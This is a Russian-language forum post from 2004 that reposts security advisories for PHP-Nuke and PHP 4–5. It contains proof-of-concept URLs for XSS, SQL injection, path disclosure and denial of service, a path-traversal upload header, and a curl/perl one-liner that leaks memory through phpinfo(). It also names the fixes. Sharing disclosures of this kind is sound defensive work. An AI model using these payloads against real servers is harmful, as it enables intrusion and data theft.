![]() |
|
| Правила Форума редакция от 22.06.2020 |
|
|||||||
|
|
Окажите посильную поддержку, мы очень надеемся на вас. Реквизиты для переводов ниже. |
|
![]() |
|
|
Опции темы | Опции просмотра |
Language
|
|
|
#1
|
|
Guest
Сообщений: n/a
|
Новые уязвимости в PHP-Nuke
1 Версия: PHP-Nuke 6.x - 7.3 Обнаружено несколько уязвимостей в PHP-Nuke в модулях Reviews, Encyclopedia, и Faq. Удаленный атакующий может получить доступ к важной информации на сервере. 1. XSS - удаленный атакующий может получить доступ к важной информации пользователей 2. SQL-инъекция в модуле Reviews. Удаленный атакующий может получить доступ к базе данных 3. Раскрытие пути к установочной директории 4. Удаленный атакующий может заставить систему потреблять большое количество ресурсов процессора, что влечет за собой отказ в обслуживании. Пример/Эксплоит: 1. XSS http://localhost/nuke73/modules.php?...=1&categories=[xss code here] http://localhost/nuke73/modules.php?...op=terms&eid=1 http://localhost/nuke73/modules.php? name=Encyclopedia&file=search&eid=[xss code here] http://localhost/nuke73/modules.php?...ry=f00bar&eid=[xss code here] http://localhost/nuke73/modules.php?...&page=2&query=[xss code here] http://localhost/nuke73/modules.php?..._review&title= f001&text=f002&score=9&[email protected]&reviewer =f00bar&url_title=foobar&url=[xss code here] http://localhost/nuke73/modules.php?...review_review& title=f001&text=f002&score=9&[email protected]&re viewer=f00bar&cover=[xss code here] http://localhost/nuke73/modules.php?...iew&title=f001 &text=f002&score=9&[email protected]&reviewer=f00b ar&rlanguage=[xss code here] http://localhost/nuke73/modules.php?...iew&title=f001 &text=f002&score=9&[email protected]&reviewer=f00b ar&hits=[xss code here] http://localhost/nuke72/modules.php?...f001&text=f002 &score=9&[email protected]&text=f00%253c/textarea>%2m http://localhost/nuke73/modules.php?...comment&uname=[xss code here]&id=8&score=9 2. SQL-инъекция http://localhost/nuke73/modules.php?...s&rop=Q&order=[sql injection code here] 3. Раскрытие пути к установочной директории http://localhost/nuke73/modules.php?...review_review& title=f001&text=f002&score=9&[email protected]&rev iewer=f00bar&; http://localhost/nuke73/modules.php?...tle=f001&text= f002&score=9&[email protected]&reviewer=f00&score= 9999 4. DoS-атака http://localhost/nuke73/modules.php? name=Reviews&rop=savecomment&id=1&uname= f00bar&score=999999999999999999999999 2 Версия: PHP 4.1.2 - 5.0.1. Две уязвимости обнаружены в PHP. Злонамеренный пользователь может раскрыть чувствительную информацию или потенциально скомпрометировать уязвимую систему. 1. Переполнение буфера обнаружено в обработке GET, POST и COOKIE переменных в "php_variables.c". Удаленный пользователь может представить специально обработанное имя параметра, заканчивающееся открытой скобкой, чтобы произошла утечка памяти, когда некоторые функции используются внутри сценария. Пример: abc[a][ 2. "$_FILES" определяет расположение загружаемых файлов. Удаленный пользователь может представить специально обработанный Content-Disposition заголовок в комбинации с уязвимостью обхода каталога, чтобы загрузить файлы в произвольное местоположение, чтобы затем выполнить произвольный код в этих файлах. Пример: Content-Disposition: form-data; name="userfile"; filename="../../../test.php" Для успешной эксплуатации требуется PHP скрипт, который использует "$_FILES" массив для манипуляции с загружаемыми файлами. Решение: Уязвимость устранена через CVS. 3 Версия: PHP 5.0.1 и более ранние версии 1. Удаленная перезапись памяти в PHP Уязвимость обнаружена в PHP в обработке MIME данных. Удаленный пользователь может перезаписать память. Уязвимость в обработке массивов обнаружена в SAPI_POST_HANDLER_FUNC() функции в 'rfc1867.c'. Удаленный пользователь может перезаписать $_FILES элемент массива. Решение: Исправление доступно через CVS: http://cvs.php.net/php-src/main/rfc1867.c 2. Удаленное раскрытие произвольных частей памяти в PHP в функции phpinfo(). Уязвимость обнаружена в PHP в функции phpinfo(). Удаленный пользователь может получить содержание памяти. Ошибка в обработке массивов в 'php_variables.c' может привести к отображению произвольных частей памяти. Пример: (phpinfo.php содержит вызов функции phpinfo()) $ curl "http://www.site.com/phpinfo.php" -d `perl -e 'print "f"x100;print "[g][=1"'` Решение: Исправление доступно через CVS: http://chora.php.net/php-src/main/php_variables.c P.S: инфу подогнал чел со странным ником Jesus. Последний раз редактировалось NetTiger; 19.11.2004 в 08:00.. |
|
| Реклама: | нетфликс тру крайм о серийных убийцах | Лучшие цены на бытовую технику: bsa6747dgwi - у нас! | цыпочка широкая как называется | ИИ анализ звонков - проведение анализа продаж ai - сервис АИхаб | Мебельный магазин: стол обеденный трансформер - Переходи на сайт! |
|
|
#2
|
|
Постоялец
![]() ![]() Регистрация: 29.01.2005
Сообщений: 230
Репутация: 204
|
Даная тема со статьей закрыта, вы можете обсудить её в теме обсуждения, но прошу не забывать посмотреть на дату написания статьи! Не смотря на то, что некоторые статьи устарели, они ещё представляют собой интерес для новичков.
|
|
|
|
![]() |
Похожие темы
|
||||
| Тема | Автор | Раздел | Ответов | Последнее сообщение |
| Уязвимости в ПО | lastmylove | Безопасность | 200 | 24.03.2012 07:52 |
| php-nuke | NektoF | Движки форумов и сайтов | 10 | 14.01.2011 14:34 |
| The foundry Nuke для создания спецэффектов в фильмах | JhonNik1 | Варезник | 4 | 27.01.2010 04:36 |
| The Foundry Nuke 4.6 OSX | osynovskyy | Mac Os X | 6 | 18.05.2007 11:20 |
|
|